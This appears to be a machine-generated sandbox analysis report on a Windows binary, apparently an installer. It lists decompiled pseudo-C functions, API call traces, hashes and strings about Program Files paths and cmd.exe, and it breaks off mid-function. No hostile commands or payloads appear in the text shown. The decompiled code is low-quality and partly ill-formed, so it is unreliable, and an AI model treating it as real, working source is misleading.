                                                            • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                            • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                            • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 35%
                                                            			E006AC477() {
                                                            				void* _t13;
                                                            				void* _t15;
                                                            				intOrPtr _t16;
                                                            				intOrPtr _t24;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t37;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t53;
                                                            				intOrPtr _t55;
                                                            				void* _t56;
                                                            				intOrPtr _t57;
                                                            
                                                            				_t13 =  *0x6d68ac(0x6cd804, 0x8000, 0, _t56 - 4); // executed
                                                            				if(_t13 != 0) {
                                                            					_t15 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t56 - 4); // executed
                                                            					if(_t15 != 0) {
                                                            						if( *0x6d67dc == 0) {
                                                            							_t16 =  *0x6d6534; // 0x0
                                                            							E005C4EA4(_t16, _t56 - 0x38);
                                                            							E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t56 - 0x38))); // executed
                                                            						} else {
                                                            							_t24 =  *0x6d6538; // 0x0
                                                            							E005C4EA4(_t24, _t56 - 0x34);
                                                            							E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t56 - 0x34)));
                                                            						}
                                                            						E006AC180(); // executed
                                                            						_pop(_t48);
                                                            						 *[fs:eax] = _t48;
                                                            						_push(E006AC58D);
                                                            						return E0040A228(_t56 - 0x38, 0xd);
                                                            					} else {
                                                            						_push(_t56);
                                                            						_push(0x6ac516);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t57;
                                                            						E0040C8BC();
                                                            						_pop(_t53);
                                                            						 *[fs:eax] = _t53;
                                                            						_push(E006AC51D);
                                                            						_t32 =  *((intOrPtr*)(_t56 - 4));
                                                            						_push(_t32);
                                                            						L0043C214();
                                                            						return _t32;
                                                            					}
                                                            				} else {
                                                            					_push(_t56);
                                                            					_push(0x6ac4c3);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t57;
                                                            					E0040C8BC();
                                                            					_pop(_t55);
                                                            					 *[fs:eax] = _t55;
                                                            					_push(E006AC4CA);
                                                            					_t37 =  *((intOrPtr*)(_t56 - 4));
                                                            					_push(_t37);
                                                            					L0043C214();
                                                            					return _t37;
                                                            				}
                                                            			}















                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                            • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                            • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                            • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 47%
                                                            			E006AC4CA() {
                                                            				void* _t10;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t36;
                                                            				intOrPtr _t41;
                                                            				void* _t42;
                                                            				intOrPtr _t43;
                                                            
                                                            				_t10 =  *0x6d68ac(0x6cd814, 0x8000, 0, _t42 - 4); // executed
                                                            				if(_t10 != 0) {
                                                            					if( *0x6d67dc == 0) {
                                                            						_t11 =  *0x6d6534; // 0x0
                                                            						E005C4EA4(_t11, _t42 - 0x38);
                                                            						E0040B4C8(0x6d6564, L"COMMAND.COM",  *((intOrPtr*)(_t42 - 0x38))); // executed
                                                            					} else {
                                                            						_t19 =  *0x6d6538; // 0x0
                                                            						E005C4EA4(_t19, _t42 - 0x34);
                                                            						E0040B4C8(0x6d6564, L"cmd.exe",  *((intOrPtr*)(_t42 - 0x34)));
                                                            					}
                                                            					E006AC180(); // executed
                                                            					_pop(_t36);
                                                            					 *[fs:eax] = _t36;
                                                            					_push(E006AC58D);
                                                            					return E0040A228(_t42 - 0x38, 0xd);
                                                            				} else {
                                                            					_push(_t42);
                                                            					_push(0x6ac516);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t43;
                                                            					E0040C8BC();
                                                            					_pop(_t41);
                                                            					 *[fs:eax] = _t41;
                                                            					_push(E006AC51D);
                                                            					_t27 =  *((intOrPtr*)(_t42 - 4));
                                                            					_push(_t27);
                                                            					L0043C214();
                                                            					return _t27;
                                                            				}
                                                            			}












                                                            APIs
                                                            • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                            • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FolderFreeKnownPathTask
                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                            • API String ID: 969438705-544719455
                                                            • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                            • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                            • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004786AC(struct HWND__* __eax) {
                                                            				int _t3;
                                                            				struct HWND__* _t7;
                                                            
                                                            				_t7 = __eax;
                                                            				_t6 = GetWindowLongW(__eax, 0xfffffffc);
                                                            				_t3 = DestroyWindow(_t7); // executed
                                                            				if(_t2 != L00414778) {
                                                            					return E004784F4(_t6);
                                                            				}
                                                            				return _t3;
                                                            			}






                                                            APIs
                                                            • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                            • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: Window$DestroyLong
                                                            • String ID:
                                                            • API String ID: 2871862000-0
                                                            • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                            • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                            • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406DF0() {
                                                            				intOrPtr _t13;
                                                            				intOrPtr* _t14;
                                                            				int _t18;
                                                            				intOrPtr* _t23;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t31;
                                                            
                                                            				_t28 =  *0x006CFAE0;
                                                            				while(_t28 != 0x6cfadc) {
                                                            					_t2 = _t28 + 4; // 0x6cfadc
                                                            					VirtualFree(_t28, 0, 0x8000); // executed
                                                            					_t28 =  *_t2;
                                                            				}
                                                            				_t25 = 0x37;
                                                            				_t13 = 0x6c5084;
                                                            				do {
                                                            					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                            					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                            					_t13 = _t13 + 0x20;
                                                            					_t25 = _t25 - 1;
                                                            				} while (_t25 != 0);
                                                            				 *0x6cfadc = 0x6cfadc;
                                                            				 *0x006CFAE0 = 0x6cfadc;
                                                            				_t26 = 0x400;
                                                            				_t23 = 0x6cfb7c;
                                                            				do {
                                                            					_t14 = _t23;
                                                            					 *_t14 = _t14;
                                                            					_t8 = _t14 + 4; // 0x6cfb7c
                                                            					 *_t8 = _t14;
                                                            					_t23 = _t23 + 8;
                                                            					_t26 = _t26 - 1;
                                                            				} while (_t26 != 0);
                                                            				 *0x6cfaf8 = 0;
                                                            				E00407760(0x6cfafc, 0x80);
                                                            				_t18 = 0;
                                                            				 *0x6cfaf4 = 0;
                                                            				_t31 =  *0x006D1B84;
                                                            				while(_t31 != 0x6d1b80) {
                                                            					_t10 = _t31 + 4; // 0x6d1b80
                                                            					_t18 = VirtualFree(_t31, 0, 0x8000);
                                                            					_t31 =  *_t10;
                                                            				}
                                                            				 *0x6d1b80 = 0x6d1b80;
                                                            				 *0x006D1B84 = 0x6d1b80;
                                                            				return _t18;
                                                            			}












                                                            APIs
                                                            • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                            • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                            • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                            • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                            • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                            • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                            • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                            • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005C857C(long __eax, void* __edx) {
                                                            				short _v2052;
                                                            				signed int _t7;
                                                            				void* _t10;
                                                            				signed int _t16;
                                                            				void* _t17;
                                                            
                                                            				_t10 = __edx;
                                                            				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
                                                            				while(_t7 > 0) {
                                                            					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
                                                            					if(_t16 <= 0x20) {
                                                            						L1:
                                                            						_t7 = _t7 - 1;
                                                            						__eflags = _t7;
                                                            						continue;
                                                            					} else {
                                                            						_t20 = _t16 - 0x2e;
                                                            						if(_t16 == 0x2e) {
                                                            							goto L1;
                                                            						}
                                                            					}
                                                            					break;
                                                            				}
                                                            				return E0040A350(_t10, _t7, _t17, _t20);
                                                            			}









                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                            • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                            • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E005C6808(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
                                                            				char _v8;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t24;
                                                            
                                                            				_push(0);
                                                            				_push(_t24);
                                                            				_push(0x5c684e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t24;
                                                            				E005C567C(__eax, __ecx,  &_v8, __eflags);
                                                            				GetFileAttributesW(E0040B278(_v8)); // executed
                                                            				_pop(_t21);
                                                            				 *[fs:eax] = _t21;
                                                            				_push(E005C6855);
                                                            				return E0040A1C8( &_v8);
                                                            			}







                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                            • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                            • Opcode Fuzzy Hash: b20873582e115f6403f0b7dec274c5602bc03a2b9c5d8d66d1ec80c96a2dfcd3
                                                            • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040D754(void* __eax) {
                                                            				short _v532;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				intOrPtr _t14;
                                                            				void* _t16;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				intOrPtr _t20;
                                                            				void* _t21;
                                                            
                                                            				_t16 = __eax;
                                                            				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                            					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                            					_t14 = E0040E9E0(_t21, _t16, _t18, _t19, _t22); // executed
                                                            					_t20 = _t14;
                                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                            					if(_t20 == 0) {
                                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                            					}
                                                            				}
                                                            				return  *((intOrPtr*)(_t16 + 0x10));
                                                            			}













                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                              • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                              • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                            • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E005118B8(intOrPtr* __eax, void* __edx) {
                                                            				void* _t15;
                                                            				intOrPtr _t16;
                                                            				intOrPtr* _t17;
                                                            
                                                            				_t17 = __eax;
                                                            				_t1 = _t17 + 0x5c; // 0x27365
                                                            				_push( *_t1);
                                                            				_t15 =  *((intOrPtr*)( *__eax + 0xc8))();
                                                            				 *(__eax + 0x98) =  *(__eax + 0x98) | 0x00000004;
                                                            				if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                                            					_t10 = _t17 + 0x58; // 0x756c6156
                                                            					_t16 =  *_t10;
                                                            					 *((intOrPtr*)(__eax + 0x1b8)) = _t16;
                                                            					return _t16;
                                                            				}
                                                            				return _t15;
                                                            			}







                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00027365,00000000,00000000,004C0068,006083EC,?,00000000,?,00000001,00000000,00000000,00000000,?,0068D5D0,00000001), ref: 005118CB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                            • Instruction ID: 9fcb5f38b0df23c263da8a60913ea9fccafb23266d8756c351c2c96681b23a4d
                                                            • Opcode Fuzzy Hash: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                            • Instruction Fuzzy Hash: 70E09A712056405BEB84DE5CC4C5B957BE9AF49214F1440E5ED498B25BC7749C48CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005C68A4(void* __eax) {
                                                            				signed char _t7;
                                                            
                                                            				_t7 = GetFileAttributesW(E0040B278(__eax)); // executed
                                                            				if(_t7 == 0xffffffff || (_t7 & 0x00000010) == 0 || (_t7 & 0x00000004) != 0) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}





                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                            • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                            • Opcode Fuzzy Hash: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                            • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005C685C(void* __eax) {
                                                            				signed char _t5;
                                                            
                                                            				_t5 = GetFileAttributesW(E0040B278(__eax)); // executed
                                                            				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}





                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005CD6D7,00000000), ref: 005C6867
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                            • Instruction ID: 78aee2f50b20cc69f9a983c300c852fe0a8819bfcc82724499c751dbdfa7c08b
                                                            • Opcode Fuzzy Hash: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                            • Instruction Fuzzy Hash: 86C08CA02412000A6E1065FE1CC9E5902E85E0533A3240B6EF438E22E3D629CAA3201A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E00424020(void* __eax) {
                                                            				int _t4;
                                                            
                                                            				_t4 = SetCurrentDirectoryW(E0040B278(__eax)); // executed
                                                            				asm("sbb eax, eax");
                                                            				return _t4 + 1;
                                                            			}





                                                            APIs
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                            • Instruction ID: daf6799c843f8394e9bb8cef5a1a486137c4a768e82a56cfe4f83ef7845b6ded
                                                            • Opcode Fuzzy Hash: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                            • Instruction Fuzzy Hash: 9AB012A27903400ACE0075FF0CC9D1D00CCD95920F7200FBFB409D2143D57EC484001C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E0042B8A3() {
                                                            				int _t4;
                                                            				intOrPtr _t7;
                                                            				void* _t8;
                                                            
                                                            				_pop(_t7);
                                                            				 *[fs:eax] = _t7;
                                                            				_push(0x42b8c1);
                                                            				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
                                                            				return _t4;
                                                            			}







                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                            • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E006ACE20() {
                                                            				struct HINSTANCE__* _t2;
                                                            
                                                            				 *0x6d68a8 = 0;
                                                            				if( *0x6d68a4 != 0) {
                                                            					_t2 =  *0x6d68a4; // 0x0
                                                            					FreeLibrary(_t2); // executed
                                                            					 *0x6d68a4 = 0;
                                                            					return 0;
                                                            				}
                                                            				return 0;
                                                            			}





                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                            • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0047845C(intOrPtr _a4, intOrPtr _a8) {
                                                            				void* __ebx;
                                                            				void* _t14;
                                                            				void _t15;
                                                            				void* _t24;
                                                            				intOrPtr _t25;
                                                            				char* _t26;
                                                            				void* _t35;
                                                            
                                                            				if( *0x6d4ff8 == 0) {
                                                            					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
